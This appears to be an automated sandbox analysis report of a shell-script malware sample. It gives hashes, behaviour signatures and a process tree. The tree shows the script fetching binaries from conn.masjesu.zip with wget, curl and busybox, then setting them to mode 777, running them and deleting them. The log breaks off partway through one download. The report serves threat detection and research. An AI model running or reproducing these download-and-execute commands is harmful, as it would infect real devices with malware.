Analysis
max time kernel
149s
max time network
151s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags
arch:mipsel, image:debian9-mipsel-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted
21/10/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
Resource
debian9-mipsel-20240729-en
General
Target
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
Size
10KB
MD5
b9ad3b4d531f384be07b7d4aa81a5b72
SHA1
ebe6f66e8450612015e404c679b5b0196cebcecc
SHA256
b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30
SHA512
b97e2d58000db3fb1342b6ef83b948820f4812618f29899f1577ed686b34e649b8663b65dc4c11760502353bfbb5bb367d7a5f981c1696a84b558f7d6e222bd1
SSDEEP
192:1Iz9tYb3++kELeypwSrSxvE5/qvEPP9tYb32kELeyTJ:1I1+kELeyqaSxvE4vErkELeyV
Malware Config
Signatures
File and Directory Permissions Modification  1 TTPs  15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
749  chmod
801  chmod
838  chmod
848  chmod
856  chmod
864  chmod
872  chmod
880  chmod
888  chmod
896  chmod
904  chmod
912  chmod
919  chmod
927  chmod
935  chmod

Executes dropped EXE  15 IoCs
ioc                                      pid  Process
/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c  750  T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c
/tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F  802  LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F
/tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6  839  rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6
/tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt  849  LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt
/tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL  857  PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL
/tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI  865  lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI
/tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH  873  MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH
/tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG  881  5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG
/tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx  889  PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx
/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB  897  JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB
/tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW  905  z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW
/tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW  913  ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW
/tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst  920  Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst
/tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI  928  8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI
/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB  936  JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB

Reads runtime system information  16 IoCs
description              ioc                            Process
File opened for reading  /proc/sys/crypto/fips_enabled  curl
(16 identical entries, one per curl process in the process tree below)

System Network Configuration Discovery  1 TTPs  47 IoCs
Adversaries may gather information about the network configuration of a system.
pid  Process
723  wget
739  curl
747  busybox
752  wget
753  curl
755  busybox
804  wget
805  curl
837  busybox
841  wget
845  curl
847  busybox
852  wget
853  curl
855  busybox
860  wget
861  curl
863  busybox
868  wget
869  curl
871  busybox
876  wget
877  curl
879  busybox
884  wget
885  curl
887  busybox
892  wget
893  curl
895  busybox
900  wget
901  curl
903  busybox
908  wget
909  curl
911  busybox
915  wget
916  curl
918  busybox
923  wget
924  curl
926  busybox
931  wget
932  curl
934  busybox
938  wget
939  curl

Writes file to tmp directory  15 IoCs
Malware often drops required files in the /tmp directory.
description                   ioc                                      Process
File opened for modification  /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F  curl
File opened for modification  /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI  curl
File opened for modification  /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB  curl
File opened for modification  /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI  curl
File opened for modification  /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6  curl
File opened for modification  /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW  curl
File opened for modification  /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW  curl
File opened for modification  /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c  curl
File opened for modification  /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt  curl
File opened for modification  /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx  curl
File opened for modification  /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB  curl
File opened for modification  /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst  curl
File opened for modification  /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL  curl
File opened for modification  /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH  curl
File opened for modification  /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG  curl
Processes
(indentation shows parent/child depth; signature abbreviations in brackets: SNCD = System Network Configuration Discovery, RRSI = Reads runtime system information, WTMP = Writes file to tmp directory, FDPM = File and Directory Permissions Modification, EDE = Executes dropped EXE)

PID 717  /tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
         command: /tmp/b59925aedbe7efc35a7f09ff6f8e186a7a09f662bfb6d538f88de221f280fc30.sh
  PID 720  /bin/rm        /bin/rm bins.sh

  PID 723  /usr/bin/wget  wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c  [SNCD]
  PID 739  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c  [RRSI, SNCD, WTMP]
  PID 747  /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c  [SNCD]
  PID 749  /bin/chmod     chmod 777 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c  [FDPM]
  PID 750  /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c  ./T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c  [EDE]
  PID 751  /bin/rm        rm T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c

  PID 752  /usr/bin/wget  wget http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F  [SNCD]
  PID 753  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F  [RRSI, SNCD, WTMP]
  PID 755  /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F  [SNCD]
  PID 801  /bin/chmod     chmod 777 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F  [FDPM]
  PID 802  /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F  ./LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F  [EDE]
  PID 803  /bin/rm        rm LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F

  PID 804  /usr/bin/wget  wget http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6  [SNCD]
  PID 805  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6  [RRSI, SNCD, WTMP]
  PID 837  /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6  [SNCD]
  PID 838  /bin/chmod     chmod 777 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6  [FDPM]
  PID 839  /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6  ./rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6  [EDE]
  PID 840  /bin/rm        rm rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6

  PID 841  /usr/bin/wget  wget http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt  [SNCD]
  PID 845  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt  [RRSI, SNCD, WTMP]
  PID 847  /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt  [SNCD]
  PID 848  /bin/chmod     chmod 777 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt  [FDPM]
  PID 849  /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt  ./LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt  [EDE]
  PID 851  /bin/rm        rm LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt

  PID 852  /usr/bin/wget  wget http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL  [SNCD]
  PID 853  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL  [RRSI, SNCD, WTMP]
  PID 855  /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL  [SNCD]
  PID 856  /bin/chmod     chmod 777 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL  [FDPM]
  PID 857  /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL  ./PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL  [EDE]
  PID 859  /bin/rm        rm PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL

  PID 860  /usr/bin/wget  wget http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI  [SNCD]
  PID 861  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI  [RRSI, SNCD, WTMP]
  PID 863  /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI  [SNCD]
  PID 864  /bin/chmod     chmod 777 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI  [FDPM]
  PID 865  /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI  ./lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI  [EDE]
  PID 867  /bin/rm        rm lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI

  PID 868  /usr/bin/wget  wget http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH  [SNCD]
  PID 869  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH  [RRSI, SNCD, WTMP]
  PID 871  /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH  [SNCD]
  PID 872  /bin/chmod     chmod 777 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH  [FDPM]
  PID 873  /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH  ./MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH  [EDE]
  PID 875  /bin/rm        rm MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH

  PID 876  /usr/bin/wget  wget http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG  [SNCD]
  PID 877  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG  [RRSI, SNCD, WTMP]
  PID 879  /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG  [SNCD]
  PID 880  /bin/chmod     chmod 777 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG  [FDPM]
  PID 881  /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG  ./5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG  [EDE]
  PID 883  /bin/rm        rm 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG

  PID 884  /usr/bin/wget  wget http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx  [SNCD]
  PID 885  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx  [RRSI, SNCD, WTMP]
  PID 887  /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx  [SNCD]
  PID 888  /bin/chmod     chmod 777 PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx  [FDPM]
  PID 889  /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx  ./PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx  [EDE]
  PID 891  /bin/rm        rm PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx

  PID 892  /usr/bin/wget  wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB  [SNCD]
  PID 893  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB  [RRSI, SNCD, WTMP]
  PID 895  /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB  [SNCD]
  PID 896  /bin/chmod     chmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB  [FDPM]
  PID 897  /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB  ./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB  [EDE]
  PID 899  /bin/rm        rm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB

  PID 900  /usr/bin/wget  wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW  [SNCD]
  PID 901  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW  [RRSI, SNCD, WTMP]
  PID 903  /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW  [SNCD]
  PID 904  /bin/chmod     chmod 777 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW  [FDPM]
  PID 905  /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW  ./z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW  [EDE]
  PID 907  /bin/rm        rm z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW

  PID 908  /usr/bin/wget  wget http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW  [SNCD]
  PID 909  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW  [RRSI, SNCD, WTMP]
  PID 911  /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW  [SNCD]
  PID 912  /bin/chmod     chmod 777 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW  [FDPM]
  PID 913  /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW  ./ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW  [EDE]
  PID 914  /bin/rm        rm ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW

  PID 915  /usr/bin/wget  wget http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst  [SNCD]
  PID 916  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst  [RRSI, SNCD, WTMP]
  PID 918  /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst  [SNCD]
  PID 919  /bin/chmod     chmod 777 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst  [FDPM]
  PID 920  /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst  ./Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst  [EDE]
  PID 922  /bin/rm        rm Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst

  PID 923  /usr/bin/wget  wget http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI  [SNCD]
  PID 924  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI  [RRSI, SNCD, WTMP]
  PID 926  /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI  [SNCD]
  PID 927  /bin/chmod     chmod 777 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI  [FDPM]
  PID 928  /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI  ./8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI  [EDE]
  PID 930  /bin/rm        rm 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI

  PID 931  /usr/bin/wget  wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB  [SNCD]
  PID 932  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB  [RRSI, SNCD, WTMP]
  PID 934  /bin/busybox   /bin/busybox wget http://conn.masjesu.zip/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB  [SNCD]
  PID 935  /bin/chmod     chmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB  [FDPM]
  PID 936  /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB  ./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB  [EDE]
  PID 937  /bin/rm        rm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB

  PID 938  /usr/bin/wget  wget http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW  [SNCD]
  PID 939  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW  [RRSI, SNCD]